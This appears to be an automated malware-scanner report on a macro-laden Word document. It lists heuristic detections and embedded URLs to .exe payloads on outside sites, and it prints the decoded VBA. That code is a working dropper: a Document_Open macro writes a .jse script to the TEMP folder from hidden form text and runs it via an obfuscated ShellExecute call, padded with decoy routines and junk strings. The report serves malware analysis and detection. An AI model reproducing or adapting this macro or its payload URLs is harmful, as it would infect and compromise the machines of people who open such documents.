MALICIOUS
120
Risk Score
Heuristics 7
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject(thereSim).ShellExecute someLittleShot -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
someLittleShot = Environ("TEMP") -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://bestefoto.no/ins4.exe In document text (OOXML body / shared strings)
- https://airmousse.vn/ins1.exeIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7593 bytes |
SHA-256: eb0e098a4b95d89e1fe334a47ac908fe63a4979d87efde00e092ce539051c8e0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub BigCardText()
Dim sDigits As String
Dim sBigStuff As String
sBigStuff = ""
Dim Jpg812d398ro As String
Jpg812d398ro = "imagine breathing alive somewhere ever raise born arrive account rich actually circle column twice height needle aloud range next he gain only beauty afternoon nearby date pet protection any engineer brass yellow over process practical wing onto prove chamber raw ice given plane voice far complete ring stiff red seeing must loss scene adjective gravity lovely rod worse successful such eleven drop edge surrounded available raise trail heading travel grabbed mixture baby value station mental foot cut needle allow air empty stranger breakfast naturally idea known constantly gentle trip sure exact excellent mouse engineer smaller zulu breathe flat real pressure rear action ranch pleasant setting"
' Select the full number in which the insertion point is located
Selection.MoveLeft Unit:=wdWord, Count:=1, Extend:=wdMove
Selection.MoveRight Unit:=wdWord, Count:=1, Extend:=wdExtend
' Store the digits in a variable
sDigits = Trim(Selection.Text)
If Val(sDigits) > 999999 Then
If Val(sDigits) <= 999999999 Then
sBigStuff = Trim(Int(Str(Val(sDigits) / 1000000)))
' Create a field containing the big digits and
' the cardtext format flag
Selection.Fields.Add Range:=Selection.Range, _
Type:=wdFieldEmpty, Text:="= " + sBigStuff + " \* CardText", _
PreserveFormatting:=True
' Select the field and copy it
Selection.MoveLeft Unit:=wdWord, Count:=1, Extend:=wdExtend
sBigStuff = Selection.Text & " million "
sDigits = Right(sDigits, 6)
End If
End If
If Val(sDigits) <= 999999 Then
' Create a field containing the digits and the cardtext format flag
Selection.Fields.Add Range:=Selection.Range, _
Type:=wdFieldEmpty, Text:="= " + sDigits + " \* CardText", _
PreserveFormatting:=True
Dim J386P00qx As Long
J386P00qx = 3511
Dim t3kspj7Q38 As Long
t3kspj7Q38 = 7174
' Select the field and copy it
Selection.MoveLeft Unit:=wdWord, Count:=1, Extend:=wdExtend
sDigits = sBigStuff & Selection.Text
' Now put the words in the document
Selection.TypeText Text:=sDigits
Selection.TypeText Text:=" "
Else
MsgBox "Number too large", vbOKOnly
End If
End Sub
Private Function thereSim()
Dim formsT As String
formsT = UserForm1.CommandButton1.Caption
Dim t72rY697w6m9 As Long
t72rY697w6m9 = 1174805
Dim yjiTB3c797a6 As Long
yjiTB3c797a6 = 2740
thereSim = Mid(formsT, 5, 17)
End Function
Public Sub FixToolTip()
Const sToolTip As String = "My ToolTip Text"
Const sTBName As String = "Standard"
Const iBtnIdx As Integer = 5
CommandBars(sTBName).Controls(iBtnIdx).TooltipText = sToolTip
End Sub
Private Function thereSomeSrc()
Dim src As String
src = UserForm2.TextBox1.Text
Dim I29H9WxMm0E As String
I29H9WxMm0E = "worry wear metal star knew throw thick pig hit yellow research behind spin raise pure ship shape sand lack move been from luck guess improve settlers learn welcome principle few accept happily cent lead wooden slowly seeing row broke known money feet related slight back favorite come center harbor stay rubbed spent border fat garden complex outline are musical using select likely paragraph oxygen golden realize unusual characteristic union active greater yourself bow wrapped small collect single influence sudden of breathe ask powder tool art anywhere dust mile nest clay swept affect lost dropped final gasoline from left gate voyage means fair rising dropped dance both studying middle mouse engine twice dish thus aware earn log organization"
thereSomeSrc = UserForm1.TextBox1.Text
End Function
Sub Readability()
Dim DocStats As String
Dim MBTitle As String
Dim J As Integer
Dim jBB7hs2ald As String
jBB7hs2ald = "stick neck monkey load development sun strength thread stared alone wooden mother baby typical master importance goes laugh sea swept fog pull sort rocky prove gate stretch power changing order society sky rest bark upon able heading between promised flower school boat appropriate alive perfectly typical away then couple tip kill fog root actually underline did settle simple pilot farmer again saddle ahead needle brick whether period provide about control underline rocket ride stranger courage one gate wonderful lovely substance southern pure planet can speak share globe mathematics source ancient notice grandmother again tomorrow brick program sing service plastic likely nuts learn article lay enemy mission sitting growth serve seed youth how fed stop sentence pull layers"
MBTitle = "Readability Statistics"
DocStats = ""
With ActiveDocument.Content
For J = 1 To 10
DocStats = DocStats & .ReadabilityStatistics(J)
DocStats = DocStats & ": "
DocStats = DocStats & .ReadabilityStatistics(J).Value
DocStats = DocStats & vbCrLf
Next J
End With
MsgBox DocStats, vbOKOnly, MBTitle
End Sub
Private Sub Document_Open()
Dim someLittleShot As String
someLittleShot = Environ("TEMP")
someLittleShot = someLittleShot & "\"
someLittleShot = someLittleShot & Rnd
someLittleShot = someLittleShot & ".jse"
Dim lH46671l As String
lH46671l = "water story question plan last flat settlers plate ancient lying ocean battle grain suddenly bread union including corn military typical likely exercise boat stranger powder science needs animal include thought along merely stepped acres atom complete flight direction speak begun spoken luck lunch proud special average sense grow forget battle voyage her high current fish themselves stranger handle fighting ring lungs boy wheat moon atomic result just wore father plane luck wild pool throat naturally lamp onto valley nice suddenly date least watch gather studied court older born slight broke card leader began moon buried tank had favorite world affect sign toy meal select try yard freedom total paragraph add method help fill know which tonight happened does"
Open someLittleShot For Output As #98
Print #98, thereSomeSrc
Close #98
Dim e8cqE3 As Long
e8cqE3 = 9462687
Dim O048hE82 As Long
O048hE82 = 7985
CreateObject(thereSim).ShellExecute someLittleShot
Dim Ma2W45Q1z As Boolean
Ma2W45Q1z = True
End Sub
Attribute VB_Name = "NewMacros"
Sub n()
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8BFB0E4B-D26A-4616-A700-38D0696ABC88}{5C4A81C5-BA9E-41D7-A4A0-BD84EEB9C4E7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{3859E691-853D-4209-9764-C45706B9FFC7}{881332B0-F0CC-477A-B8F3-C22DB9A215BC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 99328 bytes |
SHA-256: 27a55954986ef092169baaa16657dd2e3dd4cf6ba9d62dab4334208938f1404e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 13 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.